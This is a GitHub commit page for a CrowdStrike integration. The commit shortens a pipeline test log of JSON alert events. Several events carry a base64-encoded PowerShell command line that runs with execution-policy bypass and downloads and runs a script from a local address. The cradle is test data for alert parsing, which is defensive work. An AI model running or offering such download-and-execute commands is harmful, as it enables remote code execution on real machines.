Skip to content

Commit 3a5be2e

Browse files
moxarth-rathodmoxarth-rathod
committed
Make the test event shorter
1 parent 36f045c commit 3a5be2e

File tree

2 files changed

+47
-302
lines changed

2 files changed

+47
-302
lines changed

packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-alert.log

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -6,4 +6,4 @@
66
{"agent_id":"abcd1234abcd1234abcd12","aggregate_id":"","cid":"asdfasdfsadfasdfasdf","command_line":"powershell -nop -exec bypass -EncodedCommand QQBCAEMAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAxADIAMwA0ADUALwAnACkA","composite_id":"b1571642dd47ef39ab7930ff655b5fee:lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","crawled_timestamp":"2024-11-07T20:49:59.12345678Z","created_timestamp":"2024-11-07T20:49:59.123432101Z","detect_type":"endpoint","host_name":"SOMEHOST","host_type":"Server","id":"lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","image_file_name":"\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","operating_system":"Windows","pattern_id":97000,"poly_id":"CCsPIUqaBDazAOtSAoM7lq6mNa0VpOykjauHXxb2GDCIAAt9RxW1JGn1EjTE6TITrO9y8QA5VghO2K9xAIDbSfdGo30pFQ==","process_id":"123456789123","product":"overwatch","seconds_to_resolved":0,"seconds_to_triaged":0,"show_in_ui":true,"status":"new","tags":["ow/investigated","ow/resolution/benign"],"timestamp":"2024-11-07T20:47:22Z","tree_id":"12345678901","type":"lead","updated_timestamp":"2024-11-07T20:49:59.123432101Z"}
77
{"name":"OTHERUSER on OTHERHOST","agent_id":"abcd1234abcd1234abcd12","aggregate_id":"","cid":"asdfasdfsadfasdfasdf","command_line":"powershell -nop -exec bypass -EncodedCommand QQBCAEMAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAxADIAMwA0ADUALwAnACkA","composite_id":"b1571642dd47ef39ab7930ff655b5fee:lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","crawled_timestamp":"2024-11-07T20:49:59.12345678Z","created_timestamp":"2024-11-07T20:49:59.123432101Z","detect_type":"endpoint","host_name":"SOMEHOST","host_type":"Server","id":"lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","image_file_name":"\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","operating_system":"Windows","pattern_id":97000,"poly_id":"CCsPIUqaBDazAOtSAoM7lq6mNa0VpOykjauHXxb2GDCIAAt9RxW1JGn1EjTE6TITrO9y8QA5VghO2K9xAIDbSfdGo30pFQ==","process_id":"123456789123","product":"overwatch","seconds_to_resolved":0,"seconds_to_triaged":0,"show_in_ui":true,"status":"new","tags":["ow/investigated","ow/resolution/benign"],"timestamp":"2024-11-07T20:47:22Z","tree_id":"12345678901","type":"lead","updated_timestamp":"2024-11-07T20:49:59.123432101Z"}
88
{"name":"OTHERUSER on OTHERHOST","agent_id":"abcd1234abcd1234abcd12","aggregate_id":"","cid":"asdfasdfsadfasdfasdf","command_line":"powershell -nop -exec bypass -EncodedCommand QQBCAEMAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAxADIAMwA0ADUALwAnACkA","composite_id":"b1571642dd47ef39ab7930ff655b5fee:lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","crawled_timestamp":"2024-11-07T20:49:59.12345678Z","created_timestamp":"2024-11-07T20:49:59.123432101Z","detect_type":"endpoint","user_name":"SOMEUSER","host_type":"Server","id":"lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","image_file_name":"\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","operating_system":"Windows","pattern_id":97000,"poly_id":"CCsPIUqaBDazAOtSAoM7lq6mNa0VpOykjauHXxb2GDCIAAt9RxW1JGn1EjTE6TITrO9y8QA5VghO2K9xAIDbSfdGo30pFQ==","process_id":"123456789123","product":"overwatch","seconds_to_resolved":0,"seconds_to_triaged":0,"show_in_ui":true,"status":"new","tags":["ow/investigated","ow/resolution/benign"],"timestamp":"2024-11-07T20:47:22Z","tree_id":"12345678901","type":"lead","updated_timestamp":"2024-11-07T20:49:59.123432101Z"}
9-
{"agent_id":"2ce412d17b334ad4adc8c1c54dbfec4b","aggregate_id":"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778","alleged_filetype":"exe","cid":"92012896127c4a948236ba7601b886b0","cloud_indicator":"false","cmdline":"\"C:\\Users\\example.user\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\"","composite_id":"92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","confidence":10,"context_timestamp":"2023-11-03T18:00:31Z","control_graph_id":"ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778","crawl_edge_ids":{"Sensor":["KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2J<d2T/ji6R&RIHe-tZSkP*q?HW;:leq.:kk)>IVMD36[+=kiQDRm.bB?;d\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N","KZcZA__;?\"cmott@m_k)MSZ^+C?.cg<Lga#0@71X07*LY2teE56*16pL[=!bjF7g@0jOQE'jT6RX_F@sr#RP-U/d[#nm9A,A,W%cl/T@<W`alY1K_h%QDBBF;_e7S!!*'!","KZd)iK2;s\\ckQl_P*d=Mo?^a7/JKc\\*L48169!7I5;0\\<H^hNG\"ZQ3#U3\"eo<>92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';e<OHh9AmlT?5<gGqK:*L99kat+P)eZ$HR\"Ql@Q!!!$!rr","N6=Ks_B9Bncmur)?\\[fV$k/N5;:6@aB$P;R$2XAaPJ?E<G5,UfaP')8#2AY4ff+q?T?b0/RBi-YAeGmb<6Bqp[DZh#I(jObGkjJJaMf\\:#mb;BM\\L[g!\\F*M!!*'!","N6B%O`'=_7d#%u&d[+LTNDs<3307?8n=GrFI:4YYGCL,cIt-Tuj!&<6:3RbC`uNjL#gW&=)E`4^/'fp*.bFX@p_$,R6.\"=lV*T*5Vf`c.:nkd$+YD:DJ,Ls0[sArC')K%YTc$:@kUQW5s8N","N6B%s!\\k)ed$F6>a%iM\"<FTSe/eH8M:<9gf;$$.b??kpC*99aX!Lq:g6:Q3@Ga4Zrb@MaMa]L'YAt$IFBu])\"H^sF$r7gDPf6&CHpVKO3<DgK9,Y/e@V\"b&m!<<'","N6CU&`%VT\"d$=67=h\\I)/BJH:8-lS!.%\\-!$1@bAhtVO?q4]9'9'haE4N0*-0Uh'-'f',YW3]T=jL3D#N=fJi]Pp-bWej+R9q[%h[p]p26NK8q3b50k9G:.&eM<Qer>__\"59K'R?_=`'`rK/'hA\"r+L5i-*Ut5PI!!*'!","N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\"%MDAR=fo41Z]rXc\"J-\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr","N6CUF__;K!d$:\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\"X'\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\"<_/?I'[##WMh'H[Rcl+!!<<'","N6L[G__;K!d\"qhT7k?[D\"Bk:5s%+=>#DM0j$_<r/JG0TCEQ!Ug(be3)&R2JnX+RSqorgC-NCjf6XATBWX(5<L1J1DV>44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\"d.&=To@9kS!prs8N"]},"crawl_vertex_ids":{"Sensor":["aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778","ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778","ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600","mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4","mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33","pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135","pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876","pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993","quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425"]},"crawled_timestamp":"2023-11-03T19:00:23.985020992Z","created_timestamp":"2023-11-03T18:01:23.995794943Z","data_domains":["Endpoint"],"description":"ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.","device":{"agent_load_flags":"0","agent_local_time":"2023-10-12T03:45:57.753Z","agent_version":"7.04.17605.0","bios_manufacturer":"ABC","bios_version":"F8CN42WW(V2.05)","cid":"92012896127c4a948236ba7601b886b0","config_id_base":"65994763","config_id_build":"17605","config_id_platform":"3","device_id":"2ce412d17b334ad4adc8c1c54dbfec4b","external_ip":"81.2.69.142","first_seen":"2023-04-07T09:36:36Z","groups":["18704e21288243b58e4c76266d38caaf"],"hostinfo":{"active_directory_dn_display":["WinComputers","WinComputers\\ABC"],"domain":"ABC.LOCAL"},"hostname":"ABC709-1175","last_seen":"2023-11-03T17:51:42Z","local_ip":"81.2.69.142","mac_address":"ab-21-48-61-05-b2","machine_domain":"ABC.LOCAL","major_version":"10","minor_version":"0","modified_timestamp":"2023-11-03T17:53:43Z","os_version":"Windows11","ou":["ABC","WinComputers"],"platform_id":"0","platform_name":"Windows","pod_labels":null,"product_type":"1","product_type_desc":"Workstation","site_name":"Default-First-Site-Name","status":"normal","system_manufacturer":"LENOVO","system_product_name":"20VE"},"falcon_host_link":"https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","filename":"openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","grandparent_details":{"cmdline":"C:\\Windows\\system32\\userinit.exe","filename":"userinit.exe","filepath":"\\Device\\HarddiskVolume3\\Windows\\System32\\userinit.exe","local_process_id":"4328","md5":"b07f77fd3f9828b2c9d61f8a36609741","process_graph_id":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135","process_id":"392734873135","sha256":"caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33","timestamp":"2023-10-30T16:49:19Z","user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425","user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425","user_name":"yuvraj.mahajan"},"id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","indicator_id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","ioc_context":[{"ioc_description":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","ioc_source":"library_load","ioc_type":"hash_sha256","ioc_value":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","md5":"cdf9cfebb400ce89d5b6032bfcdc693b","sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","type":"module"}],"ioc_values":[],"local_process_id":"17076","logon_domain":"ABSYS","md5":"cdf9cfebb400ce89d5b6032bfcdc693b","name":"PrewittPupAdwareSensorDetect-Lowest","objective":"FalconDetectionMethod","parent_details":{"cmdline":"C:\\WINDOWS\\Explorer.EXE","filename":"explorer.exe","filepath":"\\Device\\HarddiskVolume3\\Windows\\explorer.exe","local_process_id":"1040","md5":"8cc3fcdd7d52d2d5221303c213e044ae","process_graph_id":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876","process_id":"392736520876","sha256":"0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4","timestamp":"2023-11-03T18:00:32Z","user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425","user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425","user_name":"mohit.jha"},"parent_process_id":"392736520876","pattern_disposition":2176,"pattern_disposition_description":"Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.","pattern_disposition_details":{"blocking_unsupported_or_disabled":false,"bootup_safeguard_enabled":false,"critical_process_disabled":false,"detect":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"inddet_mask":false,"indicator":false,"kill_action_failed":false,"kill_parent":false,"kill_process":false,"kill_subprocess":false,"operation_blocked":false,"policy_disabled":false,"process_blocked":true,"quarantine_file":true,"quarantine_machine":false,"registry_operation_blocked":false,"rooting":false,"sensor_only":false,"suspend_parent":false,"suspend_process":false},"pattern_id":5761,"platform":"Windows","poly_id":"AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==","process_end_time":"1699034421","process_id":"399748687993","process_start_time":"1699034413","product":"epp","quarantined_files":[{"filename":"\\Device\\Volume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","id":"2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","state":"quarantined"}],"scenario":"NGAV","severity":30,"sha1":"0000000000000000000000000000000000000000","sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","show_in_ui":true,"source_products":["FalconInsight"],"source_vendors":["CrowdStrike"],"status":"new","tactic":"MachineLearning","tactic_id":"CSTA0004","technique":"Adware/PUP","technique_id":"CST0000","timestamp":"2023-11-03T18:00:22.328Z","tree_id":"1931778","tree_root":"38687993","triggering_process_graph_id":"pid:2ce4124ad4adc8c1c54dbfec4b:399748687993","type":"cwpp-drift-indicators","updated_timestamp":"2023-11-03T19:00:23.985007341Z","user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425","user_name":"example.user","prevented":true,"worker_node_name":"example"}
9+
{"name":"OTHERUSER on OTHERHOST","agent_id":"abcd1234abcd1234abcd12","aggregate_id":"","cid":"asdfasdfsadfasdfasdf","command_line":"powershell -nop -exec bypass -EncodedCommand QQBCAEMAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAxADIAMwA0ADUALwAnACkA","composite_id":"b1571642dd47ef39ab7930ff655b5fee:lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","crawled_timestamp":"2024-11-07T20:49:59.12345678Z","created_timestamp":"2024-11-07T20:49:59.123432101Z","detect_type":"endpoint","user_name":"SOMEUSER","host_type":"Server","id":"lead:42dd47ef39ab7930ff655b5feeb15716:2dd47ef39ab7930ff655b5fee5f87ab3","image_file_name":"\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","operating_system":"Windows","pattern_id":97000,"poly_id":"CCsPIUqaBDazAOtSAoM7lq6mNa0VpOykjauHXxb2GDCIAAt9RxW1JGn1EjTE6TITrO9y8QA5VghO2K9xAIDbSfdGo30pFQ==","process_id":"123456789123","product":"overwatch","seconds_to_resolved":0,"seconds_to_triaged":0,"show_in_ui":true,"status":"new","tags":["ow/investigated","ow/resolution/benign"],"timestamp":"2024-11-07T20:47:22Z","tree_id":"12345678901","type":"lead","updated_timestamp":"2024-11-07T20:49:59.123432101Z", "prevented":true,"worker_node_name":"example"}

0 commit comments

Comments
 (0)